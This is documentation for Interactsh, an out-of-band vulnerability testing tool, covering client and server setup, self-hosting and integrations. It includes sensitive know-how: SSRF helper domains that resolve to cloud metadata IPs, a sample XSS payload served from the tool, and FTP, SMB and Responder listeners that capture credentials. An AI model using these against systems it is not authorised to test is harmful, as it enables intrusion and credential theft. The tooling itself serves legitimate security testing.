* **cvemap**: Navigate the Common Vulnerabilities and Exposures (CVE) jungle with ease using cvemap, a CLI tool designed to provide a structured and easily navigable interface to various vulnerability databases.
* **Notify**: Streamlining the workflow, Notify allows users to stream the output of various tools to multiple platforms, ensuring real-time updates and alerts.
## Utilities
These utilities can be combined with our other tooling based on the [Unix philosophy](https://blog.projectdiscovery.io/how-projectdiscovery-applies-the-unix-philosophy-to-their-tools/) to create pipelines and customize your offensive security or bug bounty hunting program.
* **pdtm**: A simple and easy-to-use tool for managing all of the open source projects from ProjectDiscovery.
* **mapcidr**: A utility program to perform multiple operations for given subnet/CIDR ranges.
* **cdncheck**: A utility to detect various technologies for a given DNS / IP address.
* **AIx**: A CLI tool to interact with Large Language Model (LLM) APIs.
* **Proxify**: A Swiss Army Knife proxy for rapid deployments.
* **SimpleHTTPServer**: A Golang enhanced version of the well-known Python SimpleHTTPServer.
***
Dive into each tool's documentation to explore in-depth functionalities, usage examples, and best practices. Your journey into enhanced offensive security starts here!
# Interactsh Install
Learn how to install Interactsh and get started
Enter the command below in a terminal to install ProjectDiscovery's Interactsh.
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
```
## Installation Notes
* The Interactsh CLI client requires the latest version of [**Go**](https://go.dev/doc/install)
# Interactsh Integrations
Learn about integrating interactsh with other tools
## Burp Suite Extension
[interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) is a Burp Suite extension developed and maintained by [@wdahlenb](https://twitter.com/wdahlenb)
* Download latest JAR file from [releases](https://github.com/wdahlenburg/interactsh-collaborator/releases) page.
* Open Burp Suite → Extender → Add → Java → Select JAR file → Next
* A new tab named **Interactsh** will appear upon successful installation.
* See the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) project for more info.
![image](https://user-images.githubusercontent.com/8293321/135176099-0e3fa01c-bdce-4f04-a94f-de0a34c7abf6.png)
## ZAP Add-On
Interactsh can be used with OWASP ZAP via the [OAST add-on for ZAP](https://www.zaproxy.org/docs/desktop/addons/oast-support/). With ZAP's scripting capabilities, you can create powerful out-of-band scan rules that leverage Interactsh's features. A standalone script template has been provided as an example (it is added automatically when you install the add-on).
* Install the OAST add-on from the [ZAP Marketplace](https://www.zaproxy.org/addons/).
* Go to Tools → Options → OAST and select **Interactsh**.
* Configure [the options](https://www.zaproxy.org/docs/desktop/addons/oast-support/services/interactsh/options/) for the client and click on "New Payload" to generate a new payload.
* OOB interactions will appear in the [OAST Tab](https://www.zaproxy.org/docs/desktop/addons/oast-support/tab/) and you can click on any of them to view the full request and response.
* You can set Interactsh as the default for ActiveScan in the `Options` > `OAST` > `General` menu.
* When checking the `Use Permanent Database` option, you can review interactions that occurred after ZAP was terminated.
* See the [OAST add-on documentation](https://www.zaproxy.org/docs/desktop/addons/oast-support/) for more info.
![zap](https://user-images.githubusercontent.com/16446369/135211920-ed24ba5a-5547-4cd4-b6d8-656af9592c20.png)
*Interactsh in ZAP*
# Interactsh Overview
A tool for detecting out-of-band vulnerabilities
**Interactsh** is an open-source tool developed by ProjectDiscovery for detecting [out-of-band (OOB) vulnerabilities](https://portswigger.net/burp/application-security-testing/oast). These are vulnerabilities that may not be identified using conventional tools or methods. Interactsh operates by generating dynamic URLs. When these URLs are requested by a target, they trigger a callback. This callback can then be monitored and analyzed to identify potential vulnerabilities in the target.
Check out [our blog introducing Interactsh](https://blog.projectdiscovery.io/interactsh-release/) and [view the repo here](https://github.com/projectdiscovery/interactsh).
# Features
* DNS/HTTP(S)/SMTP(S)/LDAP Interaction
* CLI / Web / Burp / ZAP / Docker client
* AES encryption with zero logging
* Automatic ACME based Wildcard TLS w/ Auto Renewal
* DNS Entries for Cloud Metadata service
* Dynamic HTTP Response control
* Self-Hosted Interactsh Server
* Multiple domain support **(self-hosted)**
* NTLM/SMB/FTP/RESPONDER Listener **(self-hosted)**
* Wildcard / Protected Interactions **(self-hosted)**
* Customizable Index / File hosting **(self-hosted)**
* Customizable Payload Length **(self-hosted)**
* Custom SSL Certificate **(self-hosted)**
## Client & Server
The Interactsh tool comprises two main components: [`interactsh-client`](/tools/interactsh/running) and [`interactsh-server`](/tools/interactsh/server). Each plays a critical role in the process of detecting out-of-band vulnerabilities, but they operate in distinct manners and serve different purposes.
### Interactsh Server
* Function: Captures and records callbacks from interaction URLs.
* Deployment: Hosted publicly to receive requests from tested systems.
* Use Case: Ideal for those hosting their instance for privacy or control.
ProjectDiscovery maintains a number of [publicly accessible Interactsh servers](/tools/interactsh/running#projectdiscovery-interactsh-servers) that you can use, so that you only need to run the client for your specific use case. Alternatively, you can [self-host your own Interactsh server](/tools/interactsh/running#self-hosted-interactsh-server) if you want it to run on your custom domain or you need more control over the server-side interactions.
### Interactsh Client
* Function: Generates URLs for testing, retrieves interaction logs from the server.
* Deployment: Runs locally for managing URLs and analyzing captured data.
* Use Case: Used by testers to create and analyze tests for out-of-band vulnerabilities.
## Support
Questions about using Interactsh? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Interactsh
Learn about running Interactsh with examples and detailed output
For all of the flags and options available for **Interactsh** be sure to check out the [Usage](/tools/interactsh/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
The `interactsh-client` command generates a unique payload that can be used for out-of-band (OOB) testing, with minimal interaction information in the output.
```console
interactsh-client
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v0.0.5
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Session File
`interactsh-client` with the `-sf, -session-file` flag can be used to store/read the current session information from a user-defined file. This functionality is useful for resuming the same session to poll interactions even after the client has been stopped or closed.
```console
interactsh-client -sf interact.session
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Verbose Mode
Running the `interactsh-client` in **verbose mode** (`-v`) allows you to see the whole request and response, along with an output file to analyze afterwards.
```console
interactsh-client -v -o interactsh-logs.txt
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
[c58bduhe008dovpvhvugcfemp9yyyyyyn] Received HTTP interaction from 103.22.142.211 at 2021-09-26 18:08:07
------------
HTTP Request
------------
GET /favicon.ico HTTP/2.0
Host: c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
Referer: https://c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
-------------
HTTP Response
-------------
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.pro
nyyyyyy9pmefcguvhvpvod800ehudb85c
```
## Choosing a Server
When running `interactsh-client`, it must be able to connect to a running `interactsh-server`. The Interactsh server captures and logs out-of-band interactions, while the client generates testing URLs and analyzes these interactions for vulnerabilities.
You can either use one of ProjectDiscovery's default Interactsh servers or run a self-hosted server.
### ProjectDiscovery Interactsh servers
We maintain a list of default Interactsh servers to use with `interactsh-client`:
* oast.pro
* oast.live
* oast.site
* oast.online
* oast.fun
* oast.me
Default servers may change, rotate, or go down at any time, so we recommend using a self-hosted Interactsh server if you are experiencing issues with the default servers.
### Self-Hosted interactsh Server
Using the `server` flag, `interactsh-client` can be configured to connect to a self-hosted Interactsh server; this flag accepts a single server or multiple servers separated by commas.
```sh
interactsh-client -server hackwithautomation.com
```
**Using a Protected Self-Hosted Server**
Using the `token` flag, `interactsh-client` can connect to a self-hosted Interactsh server that is protected with authentication.
```sh
interactsh-client -server hackwithautomation.com -token XXX
```
## Using with Notify
If you are away from your terminal, you may use [notify](https://github.com/projectdiscovery/notify) to send a real-time interaction notification to any supported platform.
```sh
interactsh-client | notify
```
![image](https://user-images.githubusercontent.com/8293321/116283535-9bcac180-a7a9-11eb-94d5-0313d4812fef.png)
## Interactsh Web Client
[Interactsh-web](https://github.com/projectdiscovery/interactsh-web) is a free and open-source web client that displays Interactsh interactions in a well-managed dashboard in your browser. It uses the browser's local storage to store and display all incoming interactions. By default, the web client is configured to use **interact.sh** as the default Interactsh server, and it supports other self-hosted public/authenticated Interactsh servers as well.
A hosted instance of **interactsh-web** client is available at [https://app.interactsh.com](https://app.interactsh.com)
![image](https://user-images.githubusercontent.com/8293321/136621531-d72c9ece-0076-4db1-98c9-21dcba4ba09c.png)
## Interactsh Docker Client
A [Docker image](https://hub.docker.com/r/projectdiscovery/interactsh-client) of the Interactsh client is also provided, ready to run in the following way:
```console
docker run projectdiscovery/interactsh-client:latest
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.oast.pro
```
## Integrations
### Burp Suite Extension
See [integrations](/tools/interactsh/integrations) for more details on the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator).
### ZAP Add-On
See [integrations](/tools/interactsh/integrations) for more details on using interactsh with ZAP.
### Use as library
The [examples](https://github.com/projectdiscovery/interactsh/tree/main/examples) show how to use the Interactsh client library to get external interactions for a generated URL by making an HTTP request to the URL.
### Nuclei - OAST
The [Nuclei](https://github.com/projectdiscovery/nuclei) vulnerability scanner utilizes **Interactsh** for automated payload generation and detection of out-of-band security vulnerabilities.
See the [Nuclei + Interactsh](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) integration blog and [guide document](https://docs.projectdiscovery.io/templates/reference/oob-testing) for more information.
## Cloud Metadata
Interactsh server supports DNS records for cloud metadata services, which is useful for testing SSRF-related vulnerabilities.
Currently supported metadata services:
* [AWS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
* [Alibaba](https://www.alibabacloud.com/blog/alibaba-cloud-ecs-metadata-user-data-and-dynamic-data_594351)
Example:
* **aws.interact.sh** points to 169.254.169.254
* **alibaba.interact.sh** points to 100.100.100.200
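One way to verify these records is a quick DNS lookup (assuming `dig` is available locally):
```bash
# These lookups should return the corresponding metadata service IPs
dig +short aws.interact.sh
dig +short alibaba.interact.sh
```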
# Interactsh Server
Learn about self-hosting an interactsh server
## Interactsh Server
The Interactsh server runs multiple services and captures all incoming requests. To host an instance of **interactsh-server**, you are required to set up:
1. A domain name with custom **host names** and **nameservers**.
2. A basic droplet running 24/7 in the background.
## Usage
```sh
interactsh-server -h
```
This will display help for the tool. Here are all the switches it supports.
```yaml
Usage:
./interactsh-server [flags]
Flags:
INPUT:
-d, -domain string[] single/multiple configured domain to use for server
-ip string public ip address to use for interactsh server
-lip, -listen-ip string public ip address to listen on (default "0.0.0.0")
-e, -eviction int number of days to persist interaction data in memory (default 30)
-ne, -no-eviction disable periodic data eviction from memory
-a, -auth enable authentication to server using random generated token
-t, -token string enable authentication to server using given token
-acao-url string origin url to send in acao header to use web-client (default "*")
-sa, -skip-acme skip acme registration (certificate checks/handshake + TLS protocols will be disabled)
-se, -scan-everywhere scan canary token everywhere
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-cert string custom certificate path
-privkey string custom private key path
-oih, -origin-ip-header string HTTP header containing origin ip (interactsh behind a reverse proxy)
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-server/config.yaml")
-dr, -dynamic-resp enable setting up arbitrary response data
-cr, -custom-records string custom dns records YAML file for DNS server
-hi, -http-index string custom index file for http server
-hd, -http-directory string directory with files to serve with http server
-ds, -disk disk based storage
-dsp, -disk-path string disk storage path
-csh, -server-header string custom value of Server header in response
-dv, -disable-version disable publishing interactsh version in response header
UPDATE:
-up, -update update interactsh-server to latest version
-duc, -disable-update-check disable automatic interactsh-server update check
SERVICES:
-dns-port int port to use for dns service (default 53)
-http-port int port to use for http service (default 80)
-https-port int port to use for https service (default 443)
-smtp-port int port to use for smtp service (default 25)
-smtps-port int port to use for smtps service (default 587)
-smtp-autotls-port int port to use for smtps autotls service (default 465)
-ldap-port int port to use for ldap service (default 389)
-ldap enable ldap server with full logging (authenticated)
-wc, -wildcard enable wildcard interaction for interactsh domain (authenticated)
-smb start smb agent - impacket and python 3 must be installed (authenticated)
-responder start responder agent - docker must be installed (authenticated)
-ftp start ftp agent (authenticated)
-smb-port int port to use for smb service (default 445)
-ftp-port int port to use for ftp service (default 21)
-ftp-dir string ftp directory - temporary if not specified
DEBUG:
-version show version of the project
-debug start interactsh server in debug mode
-ep, -enable-pprof enable pprof debugging server
-health-check, -hc run diagnostic check up
-metrics enable metrics endpoint
-v, -verbose display verbose interaction
```
## Getting started
### Configuring Interactsh domain
For this example, we will utilize GoDaddy for domain registration and a DigitalOcean droplet as the server, where a basic $5 droplet efficiently supports a self-hosted Interactsh server. If using different tools, please follow your registrar's guidelines for creating or updating DNS entries.
* Navigate to `https://dcc.godaddy.com/manage/{{domain}}/dns/hosts`
* Advanced Features → Host names → Add → Submit `ns1`, `ns2` with your `SERVER_IP` as value
![image](https://user-images.githubusercontent.com/8293321/135175512-135259fb-0490-4038-845a-0b62b1b8f549.png)
* Navigate to `https://dns.godaddy.com/{{domain}}/nameservers`
* Click "I'll use my own nameservers" → Submit `ns1.INTERACTSH_DOMAIN`, `ns2.INTERACTSH_DOMAIN`
![image](https://user-images.githubusercontent.com/8293321/135175627-ea9639fd-353d-441b-a9a4-dae7f540d0ae.png)
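For registrars without a comparable UI, the equivalent DNS records look roughly like this (a sketch; replace `SERVER_IP` and `INTERACTSH_DOMAIN` with your own values):
```
ns1.INTERACTSH_DOMAIN    IN  A   SERVER_IP
ns2.INTERACTSH_DOMAIN    IN  A   SERVER_IP
INTERACTSH_DOMAIN        IN  NS  ns1.INTERACTSH_DOMAIN
INTERACTSH_DOMAIN        IN  NS  ns2.INTERACTSH_DOMAIN
```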
### Configuring Interactsh server
Install `interactsh-server` on your **VPS**
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
```
Once the domain name setup is **completed**, run the command below to start `interactsh-server`
```bash
interactsh-server -domain INTERACTSH_DOMAIN
```
Following is an example of a successful installation and operation of a self-hosted server:
![image](https://user-images.githubusercontent.com/8293321/150676089-b5638c19-33a3-426a-987c-3ac6fa227012.png)
A number of required flags are configured automatically when running `interactsh-server` with default settings. For example, the `ip` and `listen-ip` flags are set to the public IP address of the system when possible.
### Running Interactsh Server
```console
interactsh-server -domain interact.sh
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
## Additional Server Options
### Using Multiple Domains
Multiple domain names can be given in the same way as above to run the same interactsh server across multiple **configured domains**.
```console
interactsh-server -d oast.pro,oast.me
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.5
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.oast.pro, oast.pro]
[INF] Loading existing SSL Certificate for: [*.oast.me, oast.me]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
While running an Interactsh server on **cloud VMs** such as Amazon EC2 or Google Cloud Platform (GCP), it is required to update the security rules to allow **"all traffic"** for inbound connections.
There are more useful capabilities supported by `interactsh-server` that are not enabled by default and are intended to be used only by **self-hosted** servers.
### Hosting behind a reverse proxy
`interactsh-server` might require custom ports for its services if the default ones are already busy. If that is the case but the default ports are still required as part of the payload, it's possible to run `interactsh-server` behind a reverse proxy, by port-forwarding HTTP/TCP/UDP based services via the `http/stream` proxy directive (`proxy_pass`).
### Nginx
Assuming that `interactsh-server` essential services run on the following ports:
* HTTP: 8080/TCP
* HTTPS: 8440/TCP
* SMTP: 8025/TCP
* DNS: 8053/UDP
* DNS: 8053/TCP
The nginx configuration file to forward the traffic would look like the following one:
```conf
# http/https
http {
    server {
        listen 443 ssl;
        server_name mysite.com;
        ssl_certificate /etc/nginx/interactsh.pem;
        ssl_certificate_key /etc/nginx/interactsh.key;
        location / {
            proxy_pass https://interactsh.mysite.com:8440/;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Proto $scheme;
        }
    }
}
stream {
    # smtp
    server {
        listen 25;
        proxy_pass interactsh.mysite.com:8025;
    }
    # dns
    server {
        listen 53;
        proxy_pass interactsh.mysite.com:8053;
    }
    server {
        listen 53 udp;
        proxy_pass interactsh.mysite.com:8053;
    }
}
```
## Hosting Additional Data
### Custom Server Index
The index page for the HTTP server can be customized when running a self-hosted Interactsh server by using the `-http-index` flag.
```console
interactsh-server -d hackwithautomation.com -http-index banner.html
```
The `{DOMAIN}` placeholder is also supported in the index file and is replaced with the server's domain name.
![image](https://user-images.githubusercontent.com/8293321/179397016-f6ee12e0-5b0b-42b6-83e7-f0972a804655.png)
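As a sketch, a minimal index file using the placeholder could be created and served like this (the banner content is illustrative):
```bash
# Create a simple banner that renders the serving domain via the {DOMAIN} placeholder
cat > banner.html <<'EOF'
<html><body><h1>Interactsh server for {DOMAIN}</h1></body></html>
EOF
interactsh-server -d hackwithautomation.com -http-index banner.html
```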
### Static File Hosting
The Interactsh HTTP server optionally enables file hosting to help in security testing. This capability can be used with a self-hosted server to serve files for common payloads for **XSS, XXE, RCE**, and other attacks.
To use this feature, use the `-http-directory` flag, which accepts a directory as input; files are served under the `/s/` path.
```console
interactsh-server -d hackwithautomation.com -http-directory ./payloads
```
![image](https://user-images.githubusercontent.com/8293321/179396480-d5ff8399-8b91-48aa-b21f-c67e40e80945.png)
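A quick usage sketch (the payload file name is hypothetical): drop a file into the served directory and fetch it under the `/s/` path:
```bash
# Host a simple XSS payload and retrieve it over HTTPS
mkdir -p ./payloads
echo '<script>alert(document.domain)</script>' > ./payloads/xss.html
curl https://hackwithautomation.com/s/xss.html
```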
### Dynamic HTTP Response
The Interactsh HTTP server optionally supports dynamic HTTP responses controlled by query parameters. This feature can be enabled by using the `-dr` or `-dynamic-resp` flag.
The following query parameter names are supported: `body`, `header`, `status`, and `delay`. Multiple `header` parameters can be specified to set multiple headers.
* **body** (response body)
* **header** (response header)
* **status** (response status code)
* **delay** (response time)
```console
curl -i 'https://hackwithautomation.com/x?status=307&body=this+is+example+body&delay=1&header=header1:value1&header=header1:value12'
HTTP/2 307
header1: value1
header1: value12
server: hackwithautomation.com
x-interactsh-version: 1.0.7
content-type: text/plain; charset=utf-8
content-length: 20
date: Tue, 13 Sep 2022 12:31:05 GMT
this is example body
```
> **Note**:
* The Dynamic HTTP Response feature is disabled by default.
* By design, this feature lets anyone run client-side code / redirects using your Interactsh domain / server.
* Using this option with an isolated domain is recommended to **avoid security impact** on associated root/subdomains.
## Wildcard Interaction
To enable `wildcard` interactions for a configured Interactsh domain, the `-wildcard` flag can be used, with implicit authentication protection via the `-auth` flag if the `-token` flag is omitted.
```console
interactsh-server -domain hackwithautomation.com -wildcard
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: 699c55544ce1604c63edb769e51190acaad1f239589a35671ccabd664385cfc7
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[HTTP] Listening on TCP 157.230.223.165:80
[SMTPS] Listening on TCP 157.230.223.165:587
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
[DNS] Listening on UDP 157.230.223.165:53
```
## Advanced Options
### Custom Payload Length
The length of the Interactsh payload is **33** characters by default, consisting of **20** (unique correlation ID) + **13** (nonce token). This can be customized using the `-cidl` and `-cidn` flags to make it shorter when required with a self-hosted Interactsh server.
```console
interactsh-server -d hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.hackwithautomation.com, hackwithautomation.com]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
**Note:** It is required to use the same lengths on both sides (**client** and **server**); otherwise, correlation will not work.
```console
interactsh-client -s hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c8rf4e8xm4.hackwithautomation.com
```
### Custom SSL Certificate
The [certmagic](https://github.com/caddyserver/certmagic) library is used by default by the Interactsh server to automatically produce wildcard certificates for the requested domain. To use your own SSL certificate with a self-hosted Interactsh server, the `cert` and `privkey` flags can be used to provide the required certificate files.
**Note:** To utilize all of the functionality of the SSL protocol, a wildcard certificate is mandatory.
```console
interactsh-server -d hackwithautomation.com -cert hackwithautomation.com.crt -privkey hackwithautomation.com.key
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTP] Listening on TCP 157.230.223.165:25
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[DNS] Listening on TCP 157.230.223.165:53
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
```
## Supported Protocols
### LDAP
By default, the Interactsh server supports LDAP interactions for payloads included in [search queries](https://ldapwiki.com/wiki/LDAP%20Query%20Examples); additionally, the `-ldap` flag can be used for complete logging.
```console
interactsh-server -domain hackwithautomation.com -sa -ldap
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: deb58fc151e6f0e53d448be3eb14cd7a11590d8950d142b9cd1abac3c2e3e7bc
[INF] Listening with the following services:
[DNS] Listening on UDP 157.230.223.165:53
[LDAP] Listening on TCP 157.230.223.165:389
[HTTP] Listening on TCP 157.230.223.165:80
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
### FTP
FTP support can be enabled with the `-ftp` flag and is recommended for self-hosted instances only. The FTP agent simulates a fully functional FTP server with authentication, capturing credentials along with every file operation. By default, the agent listens on port 21 (this can be changed with the `-ftp-port` flag) and lists, in read-only mode, the contents of the OS default temporary directory (customizable with the `-ftp-dir` option).
Example of starting the FTP daemon and capturing a login interaction:
```console
$ sudo go run . -ftp -skip-acme -debug -domain localhost
...
[INF] Outbound IP: 192.168.1.16
[INF] Client Token: 6dc07e4a76c3d5e58e4bea13ce073dc403499b128c62397aff7b934a6e4822e3
[INF] Listening with the following services:
[DNS] Listening on TCP 192.168.1.16:53
[SMTP] Listening on TCP 192.168.1.16:25
[HTTP] Listening on TCP 192.168.1.16:80
[FTP] Listening on TCP 192.168.1.16:21
[DNS] Listening on UDP 192.168.1.16:53
[LDAP] Listening on TCP 192.168.1.16:389
[DBG] FTP Interaction:
{"protocol":"ftp","unique-id":"","full-id":"","raw-request":"USER test\ntest logging in","remote-address":"127.0.0.1:51564","timestamp":"2022-09-29T00:49:42.212323+02:00"}
```
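The listening port and the served directory can both be adjusted. For example, a minimal sketch for a self-hosted instance using the `-ftp-port` and `-ftp-dir` flags described above (the port and path are illustrative):
```console
sudo interactsh-server -ftp -ftp-port 2121 -ftp-dir /tmp/ftp-share -skip-acme -debug -domain localhost
```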
### SMB
The `-smb` flag enables the Samba protocol (for self-hosted instances only). The SMB agent uses the [impacket](https://github.com/SecureAuthCorp/impacket) `smbserver` class to simulate an SMB share listening on port `445`, unless changed with the `-smb-port` flag. When enabled, interactsh executes the `smb_server.py` script under the hood, so Python 3 and the impacket dependencies are required.
Example of enabling the samba server:
```console
$ sudo interactsh-server -smb -skip-acme -debug -domain localhost
```
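To listen on a non-default port, the `-smb-port` flag described above can be added; a sketch (the port value is illustrative):
```console
sudo interactsh-server -smb -smb-port 4445 -skip-acme -debug -domain localhost
```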
### Responder
[Responder](https://github.com/lgandx/Responder) is wrapped in a Docker container that exposes various service ports via Docker port forwarding. Interactions are retrieved by monitoring the shared log file `Responder-Session.log` in the temp folder. To use it on a self-hosted instance, first build the Docker container and tag it as `interactsh` (the Docker daemon must be configured correctly, with port-forwarding capabilities):
```console
docker build . -t interactsh
```
Then run the service with:
```console
$ sudo interactsh-server -responder -d localhost
```
On default settings, the daemon listens on the following ports:
* UDP: 137, 138, 1434
* TCP: 21 (might collide with FTP daemon if used), 110, 135, 139, 389, 445, 1433, 3141, 3128
# Interactsh Usage
Learn Interactsh usage including flags and filters
## Access help
Use `interactsh-client -h` to display all of the help options.
## Interactsh options
```yaml
Usage:
./interactsh-client [flags]
Flags:
